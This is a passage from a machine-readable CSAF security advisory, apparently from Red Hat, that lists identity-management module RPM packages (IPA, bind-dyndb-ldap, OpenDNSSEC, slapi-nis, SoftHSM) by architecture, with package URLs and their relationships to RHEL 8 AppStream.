"name": "ipa-server-trust-ad-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm (idm:DL1)",
"product_id": "ipa-server-trust-ad-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-server-trust-ad@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=ppc64le\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "ipa-server-trust-ad-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"product": {
"name": "ipa-server-trust-ad-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm (idm:DL1)",
"product_id": "ipa-server-trust-ad-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-server-trust-ad-debuginfo@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=ppc64le\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "opendnssec-2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le.rpm-idm:DL1",
"product": {
"name": "opendnssec-2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le.rpm (idm:DL1)",
"product_id": "opendnssec-2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/opendnssec@2.1.7-1.module%2Bel8.9.0%2B18911%2B94941f82?arch=ppc64le\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "opendnssec-debuginfo-2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le.rpm-idm:DL1",
"product": {
"name": "opendnssec-debuginfo-2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le.rpm (idm:DL1)",
"product_id": "opendnssec-debuginfo-2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/opendnssec-debuginfo@2.1.7-1.module%2Bel8.9.0%2B18911%2B94941f82?arch=ppc64le\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "opendnssec-debugsource-2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le.rpm-idm:DL1",
"product": {
"name": "opendnssec-debugsource-2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le.rpm (idm:DL1)",
"product_id": "opendnssec-debugsource-2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/opendnssec-debugsource@2.1.7-1.module%2Bel8.9.0%2B18911%2B94941f82?arch=ppc64le\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "slapi-nis-0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le.rpm-idm:DL1",
"product": {
"name": "slapi-nis-0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le.rpm (idm:DL1)",
"product_id": "slapi-nis-0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/slapi-nis@0.60.0-4.module%2Bel8.10.0%2B20723%2B03062ebd?arch=ppc64le\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "slapi-nis-debuginfo-0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le.rpm-idm:DL1",
"product": {
"name": "slapi-nis-debuginfo-0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le.rpm (idm:DL1)",
"product_id": "slapi-nis-debuginfo-0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/slapi-nis-debuginfo@0.60.0-4.module%2Bel8.10.0%2B20723%2B03062ebd?arch=ppc64le\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "slapi-nis-debugsource-0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le.rpm-idm:DL1",
"product": {
"name": "slapi-nis-debugsource-0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le.rpm (idm:DL1)",
"product_id": "slapi-nis-debugsource-0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/slapi-nis-debugsource@0.60.0-4.module%2Bel8.10.0%2B20723%2B03062ebd?arch=ppc64le\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "softhsm-2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le.rpm-idm:DL1",
"product": {
"name": "softhsm-2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le.rpm (idm:DL1)",
"product_id": "softhsm-2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/softhsm@2.6.0-5.module%2Bel8.9.0%2B18911%2B94941f82?arch=ppc64le\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "softhsm-debuginfo-2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le.rpm-idm:DL1",
"product": {
"name": "softhsm-debuginfo-2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le.rpm (idm:DL1)",
"product_id": "softhsm-debuginfo-2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/softhsm-debuginfo@2.6.0-5.module%2Bel8.9.0%2B18911%2B94941f82?arch=ppc64le\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "softhsm-debugsource-2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le.rpm-idm:DL1",
"product": {
"name": "softhsm-debugsource-2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le.rpm (idm:DL1)",
"product_id": "softhsm-debugsource-2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/softhsm-debugsource@2.6.0-5.module%2Bel8.9.0%2B18911%2B94941f82?arch=ppc64le\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "softhsm-devel-2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le.rpm-idm:DL1",
"product": {
"name": "softhsm-devel-2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le.rpm (idm:DL1)",
"product_id": "softhsm-devel-2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/softhsm-devel@2.6.0-5.module%2Bel8.9.0%2B18911%2B94941f82?arch=ppc64le\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "ipa-client-4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64.rpm-idm:client",
"product": {
"name": "ipa-client-4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64.rpm (idm:client)",
"product_id": "ipa-client-4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64.rpm-idm:client",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-client@4.9.13-9.module%2Bel8.10.0%2B21692%2Bc9b201bc?arch=aarch64\u0026rpmmod=idm:client:8100020240417004735:143e9e98"
}
}
},
{
"category": "product_version",
"name": "ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64.rpm-idm:client",
"product": {
"name": "ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64.rpm (idm:client)",
"product_id": "ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64.rpm-idm:client",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-client-debuginfo@4.9.13-9.module%2Bel8.10.0%2B21692%2Bc9b201bc?arch=aarch64\u0026rpmmod=idm:client:8100020240417004735:143e9e98"
}
}
},
{
"category": "product_version",
"name": "ipa-client-epn-4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64.rpm-idm:client",
"product": {
"name": "ipa-client-epn-4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64.rpm (idm:client)",
"product_id": "ipa-client-epn-4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64.rpm-idm:client",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-client-epn@4.9.13-9.module%2Bel8.10.0%2B21692%2Bc9b201bc?arch=aarch64\u0026rpmmod=idm:client:8100020240417004735:143e9e98"
}
}
},
{
"category": "product_version",
"name": "ipa-client-samba-4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64.rpm-idm:client",
"product": {
"name": "ipa-client-samba-4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64.rpm (idm:client)",
"product_id": "ipa-client-samba-4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64.rpm-idm:client",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-client-samba@4.9.13-9.module%2Bel8.10.0%2B21692%2Bc9b201bc?arch=aarch64\u0026rpmmod=idm:client:8100020240417004735:143e9e98"
}
}
},
{
"category": "product_version",
"name": "ipa-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64.rpm-idm:client",
"product": {
"name": "ipa-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64.rpm (idm:client)",
"product_id": "ipa-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64.rpm-idm:client",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-debuginfo@4.9.13-9.module%2Bel8.10.0%2B21692%2Bc9b201bc?arch=aarch64\u0026rpmmod=idm:client:8100020240417004735:143e9e98"
}
}
},
{
"category": "product_version",
"name": "ipa-debugsource-4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64.rpm-idm:client",
"product": {
"name": "ipa-debugsource-4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64.rpm (idm:client)",
"product_id": "ipa-debugsource-4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64.rpm-idm:client",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-debugsource@4.9.13-9.module%2Bel8.10.0%2B21692%2Bc9b201bc?arch=aarch64\u0026rpmmod=idm:client:8100020240417004735:143e9e98"
}
}
},
{
"category": "product_version",
"name": "bind-dyndb-ldap-11.6-5.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"product": {
"name": "bind-dyndb-ldap-11.6-5.module+el8.10.0+21691+df63127d.aarch64.rpm (idm:DL1)",
"product_id": "bind-dyndb-ldap-11.6-5.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/bind-dyndb-ldap@11.6-5.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=aarch64\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "bind-dyndb-ldap-debuginfo-11.6-5.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"product": {
"name": "bind-dyndb-ldap-debuginfo-11.6-5.module+el8.10.0+21691+df63127d.aarch64.rpm (idm:DL1)",
"product_id": "bind-dyndb-ldap-debuginfo-11.6-5.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/bind-dyndb-ldap-debuginfo@11.6-5.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=aarch64\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "bind-dyndb-ldap-debugsource-11.6-5.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"product": {
"name": "bind-dyndb-ldap-debugsource-11.6-5.module+el8.10.0+21691+df63127d.aarch64.rpm (idm:DL1)",
"product_id": "bind-dyndb-ldap-debugsource-11.6-5.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/bind-dyndb-ldap-debugsource@11.6-5.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=aarch64\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "ipa-client-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"product": {
"name": "ipa-client-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm (idm:DL1)",
"product_id": "ipa-client-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-client@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=aarch64\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"product": {
"name": "ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm (idm:DL1)",
"product_id": "ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-client-debuginfo@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=aarch64\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "ipa-client-epn-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"product": {
"name": "ipa-client-epn-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm (idm:DL1)",
"product_id": "ipa-client-epn-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-client-epn@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=aarch64\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "ipa-client-samba-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"product": {
"name": "ipa-client-samba-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm (idm:DL1)",
"product_id": "ipa-client-samba-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-client-samba@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=aarch64\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "ipa-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"product": {
"name": "ipa-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm (idm:DL1)",
"product_id": "ipa-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-debuginfo@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=aarch64\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "ipa-debugsource-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"product": {
"name": "ipa-debugsource-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm (idm:DL1)",
"product_id": "ipa-debugsource-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-debugsource@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=aarch64\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "ipa-server-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"product": {
"name": "ipa-server-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm (idm:DL1)",
"product_id": "ipa-server-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-server@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=aarch64\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "ipa-server-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"product": {
"name": "ipa-server-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm (idm:DL1)",
"product_id": "ipa-server-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-server-debuginfo@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=aarch64\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "ipa-server-trust-ad-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"product": {
"name": "ipa-server-trust-ad-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm (idm:DL1)",
"product_id": "ipa-server-trust-ad-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-server-trust-ad@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=aarch64\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "ipa-server-trust-ad-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"product": {
"name": "ipa-server-trust-ad-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm (idm:DL1)",
"product_id": "ipa-server-trust-ad-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-server-trust-ad-debuginfo@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=aarch64\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "opendnssec-2.1.7-1.module+el8.9.0+18911+94941f82.aarch64.rpm-idm:DL1",
"product": {
"name": "opendnssec-2.1.7-1.module+el8.9.0+18911+94941f82.aarch64.rpm (idm:DL1)",
"product_id": "opendnssec-2.1.7-1.module+el8.9.0+18911+94941f82.aarch64.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/opendnssec@2.1.7-1.module%2Bel8.9.0%2B18911%2B94941f82?arch=aarch64\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "opendnssec-debuginfo-2.1.7-1.module+el8.9.0+18911+94941f82.aarch64.rpm-idm:DL1",
"product": {
"name": "opendnssec-debuginfo-2.1.7-1.module+el8.9.0+18911+94941f82.aarch64.rpm (idm:DL1)",
"product_id": "opendnssec-debuginfo-2.1.7-1.module+el8.9.0+18911+94941f82.aarch64.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/opendnssec-debuginfo@2.1.7-1.module%2Bel8.9.0%2B18911%2B94941f82?arch=aarch64\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "opendnssec-debugsource-2.1.7-1.module+el8.9.0+18911+94941f82.aarch64.rpm-idm:DL1",
"product": {
"name": "opendnssec-debugsource-2.1.7-1.module+el8.9.0+18911+94941f82.aarch64.rpm (idm:DL1)",
"product_id": "opendnssec-debugsource-2.1.7-1.module+el8.9.0+18911+94941f82.aarch64.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/opendnssec-debugsource@2.1.7-1.module%2Bel8.9.0%2B18911%2B94941f82?arch=aarch64\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "slapi-nis-0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64.rpm-idm:DL1",
"product": {
"name": "slapi-nis-0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64.rpm (idm:DL1)",
"product_id": "slapi-nis-0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/slapi-nis@0.60.0-4.module%2Bel8.10.0%2B20723%2B03062ebd?arch=aarch64\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "slapi-nis-debuginfo-0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64.rpm-idm:DL1",
"product": {
"name": "slapi-nis-debuginfo-0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64.rpm (idm:DL1)",
"product_id": "slapi-nis-debuginfo-0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/slapi-nis-debuginfo@0.60.0-4.module%2Bel8.10.0%2B20723%2B03062ebd?arch=aarch64\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "slapi-nis-debugsource-0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64.rpm-idm:DL1",
"product": {
"name": "slapi-nis-debugsource-0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64.rpm (idm:DL1)",
"product_id": "slapi-nis-debugsource-0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/slapi-nis-debugsource@0.60.0-4.module%2Bel8.10.0%2B20723%2B03062ebd?arch=aarch64\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "softhsm-2.6.0-5.module+el8.9.0+18911+94941f82.aarch64.rpm-idm:DL1",
"product": {
"name": "softhsm-2.6.0-5.module+el8.9.0+18911+94941f82.aarch64.rpm (idm:DL1)",
"product_id": "softhsm-2.6.0-5.module+el8.9.0+18911+94941f82.aarch64.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/softhsm@2.6.0-5.module%2Bel8.9.0%2B18911%2B94941f82?arch=aarch64\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "softhsm-debuginfo-2.6.0-5.module+el8.9.0+18911+94941f82.aarch64.rpm-idm:DL1",
"product": {
"name": "softhsm-debuginfo-2.6.0-5.module+el8.9.0+18911+94941f82.aarch64.rpm (idm:DL1)",
"product_id": "softhsm-debuginfo-2.6.0-5.module+el8.9.0+18911+94941f82.aarch64.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/softhsm-debuginfo@2.6.0-5.module%2Bel8.9.0%2B18911%2B94941f82?arch=aarch64\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "softhsm-debugsource-2.6.0-5.module+el8.9.0+18911+94941f82.aarch64.rpm-idm:DL1",
"product": {
"name": "softhsm-debugsource-2.6.0-5.module+el8.9.0+18911+94941f82.aarch64.rpm (idm:DL1)",
"product_id": "softhsm-debugsource-2.6.0-5.module+el8.9.0+18911+94941f82.aarch64.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/softhsm-debugsource@2.6.0-5.module%2Bel8.9.0%2B18911%2B94941f82?arch=aarch64\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "softhsm-devel-2.6.0-5.module+el8.9.0+18911+94941f82.aarch64.rpm-idm:DL1",
"product": {
"name": "softhsm-devel-2.6.0-5.module+el8.9.0+18911+94941f82.aarch64.rpm (idm:DL1)",
"product_id": "softhsm-devel-2.6.0-5.module+el8.9.0+18911+94941f82.aarch64.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/softhsm-devel@2.6.0-5.module%2Bel8.9.0%2B18911%2B94941f82?arch=aarch64\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
}
],
"category": "architecture",
"name": "aarch64"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "bind-dyndb-ldap-11.6-5.module+el8.10.0+21691+df63127d.aarch64.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-11.6-5.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1"
},
"product_reference": "bind-dyndb-ldap-11.6-5.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "bind-dyndb-ldap-11.6-5.module+el8.10.0+21691+df63127d.ppc64le.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-11.6-5.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1"
},
"product_reference": "bind-dyndb-ldap-11.6-5.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "bind-dyndb-ldap-11.6-5.module+el8.10.0+21691+df63127d.s390x.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-11.6-5.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1"
},
"product_reference": "bind-dyndb-ldap-11.6-5.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "bind-dyndb-ldap-11.6-5.module+el8.10.0+21691+df63127d.src.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-11.6-5.module+el8.10.0+21691+df63127d.src.rpm-idm:DL1"
},
"product_reference": "bind-dyndb-ldap-11.6-5.module+el8.10.0+21691+df63127d.src.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "bind-dyndb-ldap-11.6-5.module+el8.10.0+21691+df63127d.x86_64.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-11.6-5.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1"
},
"product_reference": "bind-dyndb-ldap-11.6-5.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "bind-dyndb-ldap-debuginfo-11.6-5.module+el8.10.0+21691+df63127d.aarch64.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debuginfo-11.6-5.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1"
},
"product_reference": "bind-dyndb-ldap-debuginfo-11.6-5.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "bind-dyndb-ldap-debuginfo-11.6-5.module+el8.10.0+21691+df63127d.ppc64le.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debuginfo-11.6-5.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1"
},
"product_reference": "bind-dyndb-ldap-debuginfo-11.6-5.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "bind-dyndb-ldap-debuginfo-11.6-5.module+el8.10.0+21691+df63127d.s390x.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debuginfo-11.6-5.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1"
},
"product_reference": "bind-dyndb-ldap-debuginfo-11.6-5.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "bind-dyndb-ldap-debuginfo-11.6-5.module+el8.10.0+21691+df63127d.x86_64.rpm (idm:DL1) as a component of Red Hat Enterprise Linux AppStream (v. 8)",
